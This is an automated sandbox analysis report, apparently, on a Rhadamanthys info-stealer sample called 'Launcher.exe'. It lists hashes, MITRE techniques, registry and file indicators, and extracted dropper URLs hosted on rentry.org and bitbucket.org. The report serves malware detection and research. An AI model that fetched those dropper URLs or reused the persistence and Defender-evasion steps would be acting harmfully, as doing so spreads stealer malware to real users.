rhadamanthys | 8d7e3ee51b3228c604b607ad50508f60658f61793f802ee9236f288a17d512dd

Analysis

max time kernel
1799s
max time network
1575s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
11-06-2024 16:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Launcher.exe
Size

7KB
MD5

b5e479d3926b22b59926050c29c4e761
SHA1

a456cc6993d12abe6c44f2d453d7ae5da2029e24
SHA256

fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
SHA512

09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
SSDEEP

192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio

Score

10^/10

rhadamanthys evasion execution persistence stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/lem61111111111/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/interception1/interception/raw/93e92759abfc60711b71f1aca42d714cee0c37c0/L.tar

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

hdsre0ck.3sb2.exe

description pid process target process

PID 5028 created 2944 5028 hdsre0ck.3sb2.exe svchost.exe
Blocklisted process makes network request 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exemsiexec.exepowershell.exe

flow pid process

2 1060 powershell.exe
4 1060 powershell.exe
11 5020 powershell.exe
12 208 powershell.exe
18 1712 msiexec.exe
21 1712 msiexec.exe
23 4940 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

4988 powershell.exe
1060 powershell.exe
208 powershell.exe
5020 powershell.exe
4940 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Executes dropped EXE 5 IoCs

Processes:

hdsre0ck.3sb0.exehdsre0ck.3sb1.exehdsre0ck.3sb2.exehdsre0ck.3sb3.exehdsre0ck.3sb4.exe

pid process

1908 hdsre0ck.3sb0.exe
624 hdsre0ck.3sb1.exe
5028 hdsre0ck.3sb2.exe
4908 hdsre0ck.3sb3.exe
4676 hdsre0ck.3sb4.exe
Loads dropped DLL 6 IoCs

Processes:

MsiExec.exeMsiExec.exeMsiExec.exe

pid process

964 MsiExec.exe
964 MsiExec.exe
964 MsiExec.exe
964 MsiExec.exe
4684 MsiExec.exe
96 MsiExec.exe

description	pid	process	target process
PID 5028 created 2944	5028	hdsre0ck.3sb2.exe	svchost.exe

flow	pid	process
2	1060	powershell.exe
4	1060	powershell.exe
11	5020	powershell.exe
12	208	powershell.exe
18	1712	msiexec.exe
21	1712	msiexec.exe
23	4940	powershell.exe

pid	process
4988	powershell.exe
1060	powershell.exe
208	powershell.exe
5020	powershell.exe
4940	powershell.exe

pid	process
1908	hdsre0ck.3sb0.exe
624	hdsre0ck.3sb1.exe
5028	hdsre0ck.3sb2.exe
4908	hdsre0ck.3sb3.exe
4676	hdsre0ck.3sb4.exe

pid	process
964	MsiExec.exe
964	MsiExec.exe
964	MsiExec.exe
964	MsiExec.exe
4684	MsiExec.exe
96	MsiExec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

hdsre0ck.3sb4.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	hdsre0ck.3sb4.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exe

description	ioc	process
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

3 bitbucket.org
4 bitbucket.org
12 bitbucket.org
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

7 api.ipify.org
8 api.ipify.org

flow	ioc
3	bitbucket.org
4	bitbucket.org
12	bitbucket.org

flow	ioc
7	api.ipify.org
8	api.ipify.org

Drops file in System32 directory 18 IoCs

Processes:

svchost.exesvchost.exesvchost.exehdsre0ck.3sb3.exeOfficeClickToRun.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Setup.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\RunNodeScriptAtLogon	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\MRT.exe	hdsre0ck.3sb3.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

hdsre0ck.3sb3.exe

description pid process target process

PID 4908 set thread context of 5036 4908 hdsre0ck.3sb3.exe dialer.exe

description	pid	process	target process
PID 4908 set thread context of 5036	4908	hdsre0ck.3sb3.exe	dialer.exe

Drops file in Program Files directory 64 IoCs

Processes:

msiexec.exe

description	ioc	process
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\parse.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\bin\npx.cmd	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npx.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\maps\zebra.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\sign\dist\bundler\base.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\lib\spin.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\are-we-there-yet\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\win_tool.py	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\corepack\dist\npm.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-owner.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\commonjs\ignore.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmfund\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-fetch\lib\abort-error.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\fs\lib\cp\polyfill.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\jsbn\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmhook\LICENSE.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cli-table3\src\table.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmpublish\README.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tar\lib\header.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\protobuf-specs\dist\__generated__\google\protobuf\descriptor.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\socks\docs\migratingFromV1.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-ls.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man1\npm-logout.1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\system\has-flag.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\arborist\isolated-reifier.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\run-script\lib\validate-options.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@tufjs\models\dist\role.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\ip-address\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmorg\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\corepack\shims\npx	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-repo.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\fs\lib\cp\errors.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\sign\dist\witness\witness.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\bundle\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-docs.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\configuring-npm\package-json.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\config\lib\definitions\definition.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-collect\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@tufjs\models\dist\key.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\clone\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\bundle\dsse.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\qrcode-terminal\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-install-test.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\color-support\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\read\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tiny-relative-date\src\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\commands\doctor.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\git\lib\revs.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cidr-regex\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmdiff\lib\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\registry.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\removal.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@tufjs\models\dist\file.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\hosted-git-info\lib\parse-url.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\xcode_emulation.py	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\lib\has-color.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\just-diff\rollup.config.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-sbom.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\arborist\rebuild.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\sign\dist\external\rekor.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\policy.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cross-spawn\lib\util\resolveCommand.js	msiexec.exe

Drops file in Windows directory 17 IoCs

Processes:

msiexec.exeRuntimeBroker.exe

description	ioc	process
File created	C:\Windows\Installer\e58db57.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDE85.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{637236E9-EF59-4F9D-8269-3083C1A6C6D6}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI432.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI722.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\e58db57.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDE45.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDE95.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE388.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE677.tmp	msiexec.exe
File created	C:\Windows\Installer\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\NodeIcon	msiexec.exe
File opened for modification	C:\Windows\Installer\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\NodeIcon	msiexec.exe
File created	C:\Windows\Installer\e58db5b.msi	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	RuntimeBroker.exe

Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

3448 sc.exe
3260 sc.exe
4940 sc.exe
4036 sc.exe
308 sc.exe
3456 sc.exe
2832 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4260 schtasks.exe
5056 schtasks.exe

pid	process
3448	sc.exe
3260	sc.exe
4940	sc.exe
4036	sc.exe
308	sc.exe
3456	sc.exe
2832	sc.exe

pid	process
4260	schtasks.exe
5056	schtasks.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid	process
3276
1260
4920
4328
664
2400
2756
4396
2748
200
1864	timeout.exe
1260
1628
3224
500
804
4804
4792
4120
4660
4236
4932
4632
1884
924	timeout.exe
964
308
3820
4680
1320
5016
4480
3996
4804
1260
1344
560
3500
4904
2756
4532
1204
4400	timeout.exe
4804
3536
1880
3320
2024
1968
5028
4264
4716
3392
2484
828
3704
3492
3932
4620
3996
2452
1056
4524
2044

Enumerates processes with tasklist 1 TTPs 8 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

4684 tasklist.exe
3300 tasklist.exe
2800 tasklist.exe
4608 tasklist.exe
1772 tasklist.exe
2400 tasklist.exe
5044 tasklist.exe
3332 tasklist.exe
Kills process with taskkill 8 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4596 taskkill.exe
2848 taskkill.exe
804 taskkill.exe
1516 taskkill.exe
4788 taskkill.exe
5112 taskkill.exe
68 taskkill.exe
5008 taskkill.exe

pid	process
4684	tasklist.exe
3300	tasklist.exe
2800	tasklist.exe
4608	tasklist.exe
1772	tasklist.exe
2400	tasklist.exe
5044	tasklist.exe
3332	tasklist.exe

pid	process
4596	taskkill.exe
2848	taskkill.exe
804	taskkill.exe
1516	taskkill.exe
4788	taskkill.exe
5112	taskkill.exe
68	taskkill.exe
5008	taskkill.exe

Modifies data under HKEY_USERS 22 IoCs

Processes:

OfficeClickToRun.exesvchost.exesvchost.exemsiexec.exeMsiExec.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={68B30AEA-E7BA-4E60-8A91-D01B9BF16C6E}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718124143"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b	msiexec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 11 Jun 2024 16:42:24 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	MsiExec.exe

Modifies registry class 32 IoCs

Processes:

msiexec.exeExplorer.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\9E63273695FED9F4289603381C6A6C6D	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\ProductIcon = "C:\\Windows\\Installer\\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\\NodeIcon"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\802C.tmp\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\npm	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\PackageCode = "AC6AA920FB9737143A7998E5BED98A71"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Media	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPathNpmModules = "EnvironmentPath"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Language = "1033"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\NodeRuntime	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\DocumentationShortcuts	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Media\1 = ";"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\802C.tmp\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\corepack	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Version = "336330754"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Assignment = "1"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPath	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\PackageName = "nodejs-installer.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Net	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	Explorer.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPathNode = "EnvironmentPath"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\ProductName = "Node.js"	msiexec.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

